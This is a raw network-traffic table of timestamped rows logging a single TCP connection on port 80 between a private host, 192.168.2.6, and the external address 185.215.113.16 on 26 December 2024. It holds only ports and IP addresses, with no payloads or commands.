Dec 26, 2024 12:41:41.069089890 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.071597099 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.071656942 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.071749926 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.074217081 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.074270010 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.074404001 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.077048063 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.077086926 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.077203035 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.079720020 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.079776049 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.079808950 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.082160950 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.082211971 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.082247019 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.084856987 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.084911108 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.084937096 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.087558985 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.087622881 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.087735891 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.090186119 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.090198994 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.090250015 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.092744112 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.092803955 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.092837095 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.095390081 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.095449924 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.095490932 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.098033905 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.098090887 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.098155022 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.100967884 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.100979090 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.101022959 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.103380919 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.103441000 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.103499889 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.105963945 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.106024027 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.106102943 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.108706951 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.108762026 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.108870029 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.111308098 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.111334085 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.111367941 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.114145041 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.114156961 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.114208937 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.116615057 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.116662025 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.116673946 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.119164944 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.119267941 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.119297981 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.121834993 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.121891022 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.121891975 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.124546051 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.124557972 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.124604940 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.127145052 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.127206087 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.127342939 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.129795074 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.129851103 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.130006075 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.132400990 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.132457972 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.132554054 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.135082006 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.135144949 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.135212898 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.137716055 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.137773991 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.137809038 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.140400887 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.140460014 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.140464067 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.142973900 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.143028975 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.143080950 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.145735979 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.145750046 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.145813942 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.148293018 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.148350954 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.148360968 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.150985003 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.150998116 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.151046991 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.153542995 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.153611898 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.153660059 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.156274080 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.156356096 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.156369925 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.158822060 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.158885956 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.158996105 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.161521912 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.161550999 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.161617994 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.164151907 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.164187908 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.164211035 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.166815042 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.166868925 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.166945934 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.169497013 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.169552088 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.169559002 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.172051907 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.172118902 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.172121048 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.174743891 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.174799919 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.174943924 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.177355051 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.177422047 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.245645046 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.245708942 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.245762110 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.246666908 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.246812105 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.246860027 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.248439074 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.248548985 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.248600006 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.250255108 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.250370979 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.250421047 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.252198935 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.252350092 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.252404928 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.254015923 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.254132986 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.254174948 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.255805016 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.255819082 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.255882978 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.257719040 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.257792950 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.257847071 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.259500980 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.259653091 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.259692907 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.261590004 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.261843920 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.261902094 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.263449907 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.263628006 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.263678074 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.265268087 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.265374899 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.265428066 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.266726971 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.266741991 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.266796112 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.268235922 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.268392086 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.268435955 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.269978046 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.270128965 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.270184040 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.271797895 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.271929026 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.271981955 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.273360014 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.273488998 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.273541927 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.275046110 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.275235891 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.275279999 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.276784897 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.276849985 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.276896954 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.278485060 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.278539896 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.278589964 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.280031919 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.280091047 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.280138969 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.281737089 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.281832933 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.281879902 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.283308029 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.283375978 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.283425093 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.284979105 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.284991980 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.285038948 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.285876036 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.285952091 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.286031961 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.286780119 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.286967993 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.287014961 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.287769079 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.287878036 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.287925959 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.288659096 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.288762093 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.288811922 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.289865017 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.289885044 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.289930105 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.290611982 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.290762901 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.290806055 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.291596889 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.291696072 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.291748047 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.292443991 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.292609930 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.292664051 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.293384075 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.293472052 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.293519974 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.294356108 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.294415951 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.294462919 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.295242071 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.295352936 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.295398951 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.296298981 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.296350956 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.296396971 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.297183037 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.297207117 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.297255039 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.298084974 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.298098087 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.298137903 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.299053907 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.299065113 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.299117088 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.299982071 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.300074100 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.300115108 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.300846100 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.300935030 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.300982952 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.301785946 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.301860094 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.301908016 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.302745104 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.302757978 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.302825928 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.303613901 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.303672075 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.303729057 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.304588079 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.304688931 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.304735899 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.305497885 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.305598021 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.305645943 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.306408882 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.306533098 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.306582928 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.307362080 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.307429075 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.307480097 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.308307886 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.308414936 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.308464050 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.309232950 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.309349060 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.309393883 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.310172081 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.310329914 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.310374975 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.311163902 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.311176062 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.311223030 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.312056065 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.312150955 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.312210083 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.313292027 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.364537954 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.464243889 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.464371920 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.464454889 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.464592934 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.464778900 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.464854002 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.465502024 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.465626001 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.465682030 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.466468096 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.466526031 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.466584921 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.467241049 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.467364073 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.467420101 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.468209028 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.468308926 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.468364954 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.469027996 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.469182968 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.469233990 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.469903946 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.470014095 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.470062017 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.470794916 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.470956087 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.471024036 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.471720934 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.471813917 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.471863985 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.472600937 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.472752094 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.472807884 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.473443985 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.473648071 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.473697901 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.474376917 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.474605083 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.474661112 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.475284100 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.475354910 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.475424051 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.476147890 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.476249933 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.476298094 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.477077007 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.477186918 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.477241993 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.477940083 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.478075981 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.478127956 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.478820086 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.478899956 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.478955984 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.479893923 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.479906082 CET	80	49784	185.215.113.16	192.168.2.6
